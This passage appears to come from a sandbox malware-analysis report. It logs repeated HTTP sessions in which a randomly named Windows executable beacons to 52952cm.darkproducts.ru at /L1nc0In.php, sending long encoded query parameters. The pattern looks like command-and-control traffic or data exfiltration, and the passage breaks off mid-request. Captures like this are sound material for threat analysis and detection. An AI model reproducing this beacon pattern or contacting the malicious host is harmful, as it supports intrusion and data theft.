8fc4394e18457c93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50001	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:23.589637041 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:04:24.297055960 CET	946	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRZTOlZGwywN88u%2BiIJHZBN7WvkfWKi8u%2B4enj%2BV7wKDI6xdljRU3pYriDIb4UXxcIKoUXRGW8q1rdgAIH6qB6kNPdEjsVEzclV%2FAAM2O%2B%2Bc9Vos%2Bl%2B1%2FSVS1zDlRXXNtfX217jkbeIcVQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc439721cacc32c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50002	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:29.331883907 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:04:30.031131983 CET	932	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cb8LfhTk1EO1riJmvspqsksgKG74nwJLYkzPV0jMIcVDUK8NEwPUO7%2BwcHM9FU16NlTw65RoWDmcPBp1RoPeYn5xDl1cahslaM12PjzuirBbceqcGHmCf3Vx8XTzn2VHKqsUXHG6%2BHyqHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43995f9b4f5fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1457&rtt_var=728&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50003	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:35.080971003 CET	2261	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=d1nIiojIzEzN2kTOlRGNzIWYlVGZmBjYilTZlRDO5IGZ5gTY4UjIsIyN3MWMklTOxUjM3IGM4cjN3YzM4EzYzYWOzMDMjVzMzYWMkNGOzQDNiojI4gDM4cTN1UGNldDOmRGNyQWO1QWNxMWO1ATZiRGOiBjIsISN4EmMmNGNzMTO3kzY1cDMxMTOiRjMhVGN2UTZwQmYkJjMiNmMxYWZiojI5ETOhF2YmdjM5YjZmljZ4ATNiJzNwcTOkRDNlZjM0AjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:04:35.769171953 CET	942	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Icywu%2B0E8TJ%2FXQLQ5gZpNx9mb%2B94RROQIOHhqc%2FqzR8KC9QqNppCaxZWgRfl62VDu79De56NeLn%2B4sE2XmrHREYUOH22vZZWM3QV2GBEuBtczctsMi21gL0rnwrrMcVOteOH%2BZx%2Bdcod3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc439b9caec0f42-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2261&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50004	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:40.789994001 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:04:41.505434036 CET	931	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zN4EXwnyyBo376uDlwpWawnuqpbkiCrYQhqAjeV663a6MzJdgLw6y0AHJNg9kQ4BgKOPJZz6x3Czr6ZTdiZva3H%2FPb0c4gK8uyT8crpTrVXE0P7grzrY3PTFnnSdp2XRk1hjDWjArP1PIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc439ddaaaeefa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2039&rtt_var=1019&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=116&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50005	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:46.522782087 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:04:47.226155996 CET	936	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZFhYRDsiMiBtWLOIZWmZmHTNdxwpiAqGnQYl4Rus%2B5XFFuKU20%2BKDSLfv9ADTj78%2BCBWxrVp1%2BevJsOP36XgRLSIyXh5IHo0aB76PlMF21BeKpkUca%2BdUN5v7dZ3286p70nE%2F8gxBcDGw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43a017b314343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2310&min_rtt=2310&rtt_var=1155&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye
Jan 3, 2025 17:04:47.357685089 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50006	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:52.384136915 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:04:53.106367111 CET	946	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:04:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3OeXrOGYh4TxNxr6Dn1kR6UVeiEQjMBm%2BPDzCen7KPzQdt3a%2F5CV1DoI5m1%2FvAZYNtjw014O5%2BviGDjq5c3DR1g8s4GS%2BW173h1UZgji5N%2FqC6A0k7VkZMH2%2BHwnHGg5B%2FJ1%2F7V7LqtEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43a260a5e424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1712&rtt_var=856&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50007	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:04:58.115778923 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXa